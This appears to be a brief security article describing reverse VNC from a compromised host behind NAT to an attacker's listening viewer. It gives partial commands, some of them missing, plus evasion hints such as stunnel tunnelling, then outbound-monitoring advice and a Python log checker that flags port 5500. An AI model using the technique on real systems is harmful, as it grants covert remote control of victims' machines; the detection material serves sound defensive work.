A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC, can be useful.
If a target system is behind a NAT, it is still possible for it to connect outwards with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible even without using SSH port tunnelling.
This article is only intended for educational purposes. Please do not use this to try to bypass security controls.
How to set this up
In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.
On the attacking system (which has a public IP address) start vncviewer as follows:
You should get a response something like:
vncviewer -listen: Listening on port 5500
On the target system, you can start the VNC server and enter a password as follows:
It is then possible to use vncconnect to connect the local VNC server on the target system back to the attacker system:
vncconnect -display :1
This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attacker's desktop.
Of course, these connections could be run on different ports (depending on firewall rules), redirected with port redirectors, or tunnelled over other protocols, for example SSL using stunnel.
Similar solutions are just as easy with Windows systems, so definitely something to be aware of.
- When defining firewall rules, it is very important to focus on outbound rules (in addition to inbound rules).
- Outbound connections should be logged and monitored to help identify hackers, virus infections, and technical employees trying to bypass security restrictions.
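As an added example (not part of the original post), a small Python checker for the logging recommendation above: it reads constructed netfilter/iptables LOG lines and flags locally originated TCP connections to port 5500 (the default vncviewer listening port shown earlier) or to any destination port outside an assumed allowlist. The log format, the allowlist and the sample addresses are assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed netfilter LOG lines (not from the original post). Locally
# originated packets carry an empty IN= and a populated OUT= interface.
SAMPLE_LOG = """\
Mar 10 12:00:01 host kernel: OUT-NEW: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP SPT=41234 DPT=443 SYN
Mar 10 12:00:02 host kernel: OUT-NEW: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.9 PROTO=TCP SPT=41235 DPT=5500 SYN
Mar 10 12:00:03 host kernel: IN-NEW: IN=eth0 OUT= SRC=192.0.2.4 DST=10.0.0.5 PROTO=TCP SPT=55000 DPT=5500 SYN
Mar 10 12:00:04 host kernel: OUT-NEW: IN= OUT=eth0 SRC=10.0.0.6 DST=203.0.113.7 PROTO=TCP SPT=41236 DPT=8443 SYN
Mar 10 12:00:05 host kernel: OUT-NEW: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.9 PROTO=UDP SPT=5353 DPT=5353
"""

# Destination ports hosts are expected to open outbound (assumed policy).
APPROVED_OUTBOUND_TCP = {80, 443}
# Default port on which "vncviewer -listen" waits for reverse connections.
REVERSE_VNC_PORT = 5500

FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")


def parse_fields(line: str) -> Dict[str, str]:
    """Extract KEY=value pairs from one netfilter LOG line."""
    return dict(FIELD_RE.findall(line))


def classify(line: str) -> str:
    """Return 'reverse-vnc', 'review', 'ok' or 'ignore' for one log line."""
    f = parse_fields(line)
    # Only locally originated connection attempts matter: OUT set, IN empty.
    if not f.get("OUT") or f.get("IN"):
        return "ignore"
    if f.get("PROTO") != "TCP" or "SYN" not in line:
        return "ignore"
    dport = int(f.get("DPT", "0"))
    if dport == REVERSE_VNC_PORT:
        return "reverse-vnc"
    if dport not in APPROVED_OUTBOUND_TCP:
        return "review"
    return "ok"


def find_suspicious(log_text: str) -> List[dict]:
    """Collect outbound new connections that are not on the approved list."""
    hits = []
    for line in log_text.splitlines():
        verdict = classify(line)
        if verdict in ("reverse-vnc", "review"):
            f = parse_fields(line)
            hits.append({"src": f["SRC"], "dst": f["DST"],
                         "dport": int(f["DPT"]), "verdict": verdict})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Inbound attempts and non-TCP traffic are deliberately ignored so that only connections the host itself initiated reach the review queue.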